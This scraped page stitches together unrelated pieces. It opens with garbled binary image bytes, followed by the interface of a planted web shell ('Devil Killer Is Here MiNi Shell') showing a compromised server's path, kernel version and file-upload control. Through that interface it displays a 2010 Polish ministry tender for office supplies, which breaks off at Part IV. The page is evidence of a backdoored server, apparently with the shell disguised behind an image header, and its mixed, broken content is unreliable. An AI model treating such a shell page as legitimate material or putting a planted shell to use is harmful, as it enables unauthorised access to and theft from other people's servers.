JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101203/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101203/395808-N-2010.html

<p class="kh_header"><b>Warszawa: Sukcesywne dostawy artykułów biurowych dla Ministerstwa Nauki i Szkolnictwa Wyższego</b><br>
<b>Numer ogłoszenia: 395808 - 2010; data zamieszczenia: 03.12.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ministerstwo Nauki i Szkolnictwa Wyższego , ul. Wspólna 1/3, 00-529 Warszawa, woj. mazowieckie, tel. 022 5292738, faks 022 5292780.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mnisw.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa centralna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sukcesywne dostawy artykułów biurowych dla Ministerstwa Nauki i Szkolnictwa Wyższego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1) Przedmiotem zamówienia jest sukcesywna dostawa artykułów biurowych. Szczegółowy opis przedmiotu zamówienia oraz jego podział na części przedstawiono w Załączniku Nr 1  do  SIWZ. Zamawiający dopuszcza składanie ofert częściowych. Wykonawca składający ofertę w niniejszym postępowaniu musi złożyć ofertę na wszystkie wymienione przez Zamawiającego pozycje 
w danej części. W przypadku okoliczności unieważnienia postępowania Zamawiający unieważni postępowanie tylko w danej części.
2) Zamawiający dopuszcza zaoferowanie przez Wykonawcę artykułów równoważnych. Jako równoważne Zamawiający uzna artykuły biurowe spełniające łącznie minimalne wymagania określone w Załączniku Nr 1 do SIWZ (kol. nr 3). Jeżeli Wykonawca zaoferuje w swojej ofercie produkt równoważny, zobowiązany jest podać jego nazwę oraz parametry techniczne. W przypadku wątpliwości dotyczących równoważności oferowanych artykułów biurowych Zamawiający wezwie Wykonawcę do złożenia we wskazanym terminie wyjaśnień dotyczących treści oferty. Ciężar udowodnienia równoważności spoczywa na Wykonawcy. Jeżeli oferowane przez Wykonawcę artykuły biurowe będą miały parametry techniczne gorsze od wymaganych w opisie przedmiotu zamówienia, Zamawiający odrzuci ofertę na podstawie art. 89 ust. 1 pkt 2 ustawy Pzp. 
3) Pozostałe warunki dotyczące realizacji zamówienia zostały określone w Istotnych Postanowieniach Umowy, stanowiących Załącznik Nr 2 do SIWZ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7, 30.19.20.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wypełniony i podpisany Formularz ofertowy - wzór stanowi Załącznik Nr 6
do SIWZ oraz Formularz cenowy - wzór stanowi Załącznik Nr 7 do SIWZ</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Strony przewidują możliwość dokonania istotnych zmian postanowień zawartej umowy w zakresie zmiany kwoty wynagrodzenia Wykonawcy, w przypadku zwiększenia bądź zmniejszenia stawek podatku od towarów i usług, dotyczących przedmiotu zamówienia, w wyniku zmiany przepisów o podatku 
od towarów i usług, które wejdą w życie po dniu zawarcia umowy, a przed wykonaniem przez Wykonawcę obowiązku, po wykonaniu którego Wykonawca jest uprawniony do uzyskania wynagrodzenia.
2. W przypadku, o którym mowa w ust. 1, wynagrodzenie Wykonawcy może ulec odpowiedniemu zwiększeniu bądź zmniejszeniu, jeżeli w wyniku zastosowania zmienionych stawek podatku od towarów i usług ulega zmianie kwota podatku oraz wynagrodzenia Wykonawcy uwzględniającego podatek od towarów i usług, 
z zastrzeżeniem ust. 3 i 4.
3. W przypadku zwiększenia bądź zmniejszenia stawek podatku od towarów i usług, dotyczących przedmiotu umowy, w wyniku zmiany przepisów wymienionych w ust. 1, które nastąpiło w trakcie okresu rozliczeniowego, rozumianego jako okres trzech dni roboczych od dnia złożenia zamówienia na dostawę przez Zamawiającego, w ciągu których Wykonawca ma obowiązek zrealizowania tej dostawy, wynagrodzenie Wykonawcy za tę dostawę może ulec odpowiedniemu zwiększeniu bądź zmniejszeniu, jeżeli w wyniku zastosowania zmienionych stawek ww. podatku ulega zmianie kwota podatku i wynarodzenia Wykonawcy. 
4. Wykonawca jest uprawniony do uzyskania zwiększonego wynagrodzenia za daną dostawę:
1) w sytuacji, gdy wykonał wszystkie obowiązki wynikające z umowy w okresie rozliczeniowym, którego płatność dotyczy, a uprawniające do uzyskania wynagrodzenia, oraz przekazał Zamawiającemu fakturę VAT, za daną dostawę, wystawioną na podstawie protokołu odbioru podpisanego bez zastrzeżeń przez Zamawiającego i Wykonawcę, 
2) w odniesieniu do kolejnych okresów rozliczeniowych.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.nauka.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.bip.nauka.gov.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.12.2010 godzina 09:00, miejsce: Ministerstwo Nauki i Szkolnictwa Wyższego
ul. Wspólna 1/3 (wejście od ul. Hożej 20)
00-529 Warszawa
Wydział Zamówień Publicznych, pokój 40.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie jest współfinansowane ze środków Unii Europejskiej. PO KL PO IG oraz PO IiŚ.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część I.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1 Bloczki samoprzylepne wymiar 75x75 mm	3 000 szt,
2 Bloczki samoprzylepne wymiar 51x76 mm	2 000 szt ,
3 Długopis BIC Orange kolor niebieski lub równoważny	900 szt,
4 Długopis BIC Orange kolor czarny lub równoważny	800 szt,
5 Długopis żelowy niebieski	500 szt ,
6 Etykiety samoprzylepne	70 opakowań po 100 arkuszy,
7 Foliopis Stabilo lub równoważny	200 szt ,
8 Klips do papieru 25 mm	300 opakowan po 12 szt ,
9 Klips do papieru 32 mm	300 opakowań po 12 szt,
10 Klips do papieru 51 mm	50 opakowan po 12 szt,
11 Koperta aktowa B4	20 000 szt,
12 Koperta aktowa C4	20 000 szt,
13 Koperta aktowa B5	50 000 szt,
14 Marker PENTEL N850 lub równoważny	300 szt,
15 Płyta CD-R 80 min VERBATIM lub równoważna	6 000 szt,
16 Pojemnik kartonowy ścięty	900 szt,
17 Przekładki kartonowe do segregatora	300 opakowań po 12 przekładek,
18 Segregator A4 szerokość grzbietu 50 mm	2 000 szt,
19 Segregator A4 szerokość grzbietu 75 mm	6 000 szt ,
20 Skoroszyt	4 000 szt ,
21 Spinacz owalny 50 mm	500 opakowań po 100 szt ,
22 Spinacz owalny 33 mm	1 000 opakowań po 100 szt,
23 Teczka kartonowa wiązana	50 000 szt,
24 Teczka kartonowa z gumką	15 000 szt,
25 Wkład żelowy do długopisu z Lp.5 - 600 szt,
26 Zakładki indeksujące	900 szt,
27 Zakreślacz Stabilo żółty lub równoważny	500 szt,
28 Zakreślacz Stabilo zielony lub równoważny	400 szt,
29 Zakreślacz Stabilo pomarańczowy lub równoważny	400 szt,
30 Zakreślacz Stabilo różowy lub równoważny	200 szt,
31 Zszywacz	50 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7, 30.19.20.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część II.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1 Bloczki samoprzylepne wymiar 75x75 mm	150 szt,
2 Bloczki samoprzylepne wymiar 51x76 mm	200 szt,
3 Długopis BIC Orange kolor niebieski lub równoważny	40 szt,
4 Długopis BIC Orange kolor czarny lub równoważny	40 szt,
5 Pojemnik kartonowy ścięty	200 szt,
6 Klips do papieru 25 mm	50 opakowań po 12 szt,
7 Klips do papieru 32 mm	50 opakowań po 12 szt,
8 Klips do papieru 51 mm	50 opakowań po 12 szt,
9 Marker PENTEL N850 lub równoważny	80 szt,
10 Płyta CD-R 80 min VERBATIM lub równoważna 	50 szt,
11 Przekładki kartonowe do segregatora	10 opakowań po 10 szt przekładek,
12 Segregator A4 kolor czarny szerokość grzbietu 75 mm	150 szt ,
13 Segregator A4 kolor czerwony szerokość grzbietu 75 mm	50 szt,
14 Segregator A4 kolor żółty szerokość grzbietu 75 mm	50 szt,
15 Segregator A4 kolor zielony szerokość grzbietu 75 mm	50 szt,
16 Spinacz owalny 50 mm	10 opakowań po 100 szt,
17 Spinacz owalny 33 mm	10 opakowań po 100 szt,
18 Teczka kartonowa z gumką	3 500 szt,
19 Zakładki indeksujące	50 szt,
20 Skoroszyt	300 szt,
21 Koszulki cienkie	360 opakowań po 100 szt,
22 Koszulki poszerzane	150 opakowań po 25 szt,
23 Koszulki na płyty CD	300 szt,
24 Ołówki	 80 szt,
25 Temperówka	20 szt,
26 Taśma samoprzylepna	30 szt,
27 Dziurkacz do papieru	3 szt,
28 Zszywacz do papieru	5 szt,
29 Zszywki duże	15 opakowań po 5.000 szt,
30 Zszywki małe	50 opakowań po 1.000 szt,
31 Koperta aktowa C4	8 000 szt,
32 Koperta aktowa A4	5 000 szt,
33 Koperta	4 000 szt,
34 Zakreślacz Stabilo żółty lub równoważny	20 szt,
35 Zakreślacz Stabilo zielony lub równoważny	20 szt,
36 Zakreślacz Stabilo pomarańczowy lub równoważny	20 szt,
37 Zakreślacz Stabilo różowy lub równoważny	20 szt,
38 Etykiety samoprzylepne rozmiar 70 mm x 16,9 mm	3 opakowania po 100 arkuszy,
39 Etykiety samoprzylepne rozmiar 105 mm x 48  mm	13 opakowań po 100 arkuszy,
40 Nożyczki	10 szt,
41 Klej biurowy w tubce	10 szt,
42 Klej biurowy w taśmie	10 szt,
43 Korektor w długopisie	10 szt,
44 Korektor w taśmie	10 szt,
45 Gumka do ścierania	30 szt,
46 Pamięć USB KINGSTON 4 GB lub równoważny	15 szt,
47 Kołonotatnik	50 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7, 30.19.20.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Część III.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1 Zszywacz archiwizacyjny	9 szt,
2 Zszywacz duży 	6 szt,
3 Zszywacz mały 	26 szt, 
4 Zszywki archiwizacyjne	55 opakowań po 1.000 szt,
5 Zszywki (10)	10 opakowań po 1.000 szt,
6 Zszywki małe	173 opakowania po 1.000 szt,
7 Zszywki duże	63 opakowania po 5.000 szt,
8 Dziurkacz mały 	24 szt,
9 Dziurkacz duży blokowy 	3 szt,
10 Długopis automatyczny czarny	47 szt,
11 Długopis automatyczny niebieski 	85 szt,
12 Wkład do długopisu automatycznego 	100 szt,
13 Wkład do długopisu automatycznego	160 szt,
14 Długopis BIC Orange kolor niebieski lub równoważny	40 szt,
15 Długopis BIC Orange kolor czarny lub równoważny	31 szt,
16 Długopis BIC Orange kolor zielony lub równoważny	3 szt,
17 Długopis BIC Orange kolor czerwony lub równoważny	3 szt,
18 Długopis żelowy czarny 	80 szt,
19 Długopis żelowy czerwony 	30 szt,
20 Długopis żelowy zielony 	25 szt,
21 Długopis żelowy niebieski 	110 szt,
22 Wkład do długopisu  żelowego czarnego 	160 szt,
23 Wkład do długopisu  żelowego czerwonego 	30 szt,
24 Wkład do długopisu  żelowego zielonego 	50 szt,
25 Wkład do długopisu  żelowego niebieskiego	220 szt,
26 Cienkopisy 	15 kompletów po 4 szt,
27 Linijka	32 szt,
28 Ołówek automatyczny 	45 szt,
29 Grafity do ołówka automatycznego 	5 opakowań po 15 szt,
30 Ołówki	 116 szt,
31 Gumka Rasoplast Combi Staedter lub równoważna	60 szt,
32 Klips do papieru 19 mm	28 opakowań po 12 szt,
33 Klips do papieru 25 mm	84 opakowań po 12 szt,
34 Klips do papieru 32 mm	60 opakowań po 12 szt,
35 Klips do papieru 41 mm	30 opakowań po 12 szt,
36 Klips do papieru 51 mm	73 opakowań po 12 szt,
37 Koszulki cienkie A4	95 opakowań po 100 szt,
38 Koszulki cienkie A5	10 opakowań po 100 szt,
39 Koszulki na suwak A4	64 opakowania po 5 szt,
40 Koszulki z klapą	3 opakowania po 10 szt,
41 Koszulki poszerzane 	140 opakowań po 10 szt,
42 Korektor w taśmie	85 szt,
43 Korektor w płynie	26 szt,
44 Klej biurowy 	70 szt,
45 Separatory	95 opakowań po 100 szt,
46 Przekładki kartonowe do segregatora	13 opakowań po 10 przekładek,
47 Teczka kartonowa  wiązana 	1 370 szt ,
48 Teczka lakierowana  z gumką 	605 szt,
49 Teczka pudełko z gumką Donau lub równoważny	5 szt,
50 Temperówka	27 szt,
51 Bloczki samoprzylepne Donau Eco 75x75 mm lub równoważne	170 szt,
52 Bloczki samoprzylepne 76x127 mm	70 szt,
53 Bloczki samoprzylepne 51x76 mm	100 szt, 
54 Bloczki samoprzylepne 40x50 mm	59 szt,
55 Bloczki samoprzylepne Donau Eco 51x38 mm lub równoważne	105 szt,
56 Koperta aktowa C4	4000 szt,
57 Koperta aktowa B5	560 szt,
58 Koperta aktowa B4	200 szt,
59 Koperta aktowa B4 z rozszerzanymi bokami i spodem 	1030 szt,
60 Koperta listowa C5	350 szt,
61 Koperta listowa DL	100 szt,
62 Koperta powietrzna ochronna z warstwą folii bąbelkowej wewnątrz	110 szt,
63 Koperta z folią bąbelkową na płyty CD/DVD 	50 szt,
64 Segregator A4 szerokość grzbietu 50 mm	180 szt,
65 Segregator A4 szerokość grzbietu 75 mm	295 szt,
66 Segregator A4 szerokość grzbietu 80 mm	20 szt,
67 Segregator A5 szerokość grzbietu 75 mm	15 szt,
68 Kostka papierowa klejona	50 szt,
69 Kostka papierowa nieklejona	65 szt,
70 Pamięć USB KINGSTON 2 GB lub równoważny	82 szt,
71 Pinezki  tablicowe beczułki kolorowe 	10 opakowań po 100 szt,
72 Pojemnik kartonowy archiwizacyjny ścięty Esselte lub równoważny 	715 szt,
73 Kolorowy karton archiwizacyjny Esselte lub równoważny 	300 szt,
74 Płyta CD-R 80 min VERBATIM lub równoważna	135 opakowań po 10 szt,
75 Płyta DVD+R VERBATIM lub równoważna	14 opakowań po 10 szt,
76 Płyta DVD-R VERBATIM lub równoważna	1 opakowanie po 10 szt,
77 Płyta DVD-RW VERBATIM lub równoważna	4 opakowania po 10 szt,
78 Zakładki indeksujące	250 szt,
79 Ofertówka groszkowa A4	15 opakowań po 25 szt,
80 Ofertówka twarda A4 	35 opakowań po 25 szt,
81 Cienkopis niebieski 	35 szt,
82 Cienkopis zielony	23 szt,
83 Cienkopis czerwony 	25 szt,
84 Cienkopis czarny 	48 szt,
85 Brulion A5 	51 szt,
86 Brulion A4 	25 szt,
87 Blok biurowy A5	35 szt,
88 Blok biurowy A4	57 szt,
89 Taśma klejąca mała 	41 szt,
90 Taśma klejąca duża 	9 szt,
91 Taśma Scotch Magic lub równoważna	33 szt,
92 Taśma Scotch Crystal 600 lub równoważna	45 szt,
93 Spinacze  trójkątne 33 mm	66 opakowań po 100 szt,
94 Spinacze trójkątne 50 mm	35 opakowań po 100 szt,
95 Spinacze krzyżowe No2 41 mm 	35 opakowań po 50 szt,
96 Nożyczki	15 szt,
97 Nożyk introligatorski 	1 szt,
98 Marker olejowy srebrny 	2 szt,
99 Marker olejowy złoty 	3 szt,
100 Marker czarny permanentny (foliopis)	70 szt,
101 Marker czarny do CD/DVD	48 szt,
102 Zakreślacz zielony 	30 szt,
103 Zakreślacz czerwony	13 szt,
104 Zakreślacz pomarańczowy 	30 szt,
105 Zakreślacz różowy 	28 szt,
106 Zakreślacz żółty	34 szt,
107 Zakreślacz niebieski 	15 szt,
108 Rozszywacz	25 szt,
109 Przybornik na biurko	16 szt,
110 Etykiety samoprzylepne rozmiar 105 mm x 57  mm 	6 opakowań po 100 arkuszy,
111 Etykiety samoprzylepne rozmiar 105 mm x 48  mm 	2 opakowania po 100 arkuszy,
112 Teczka harmonijkowa Deli lub równoważna         	6 szt,
113 Teczka harmonijkowa 	3 szt,
114 Clip deska A4	15 szt,
115 Skoroszyt twardy A4	500 szt,
116 Półka na dokumenty 	75 szt,
117 Wizytownik	2 szt,
118 Wizytownik stojący obrotowy Durable lub równoważny 	1 szt,
119 Kołonotatnik A4	20 szt,
120 Skorowidz A5 	3 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7, 30.19.20.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Część IV.</p>
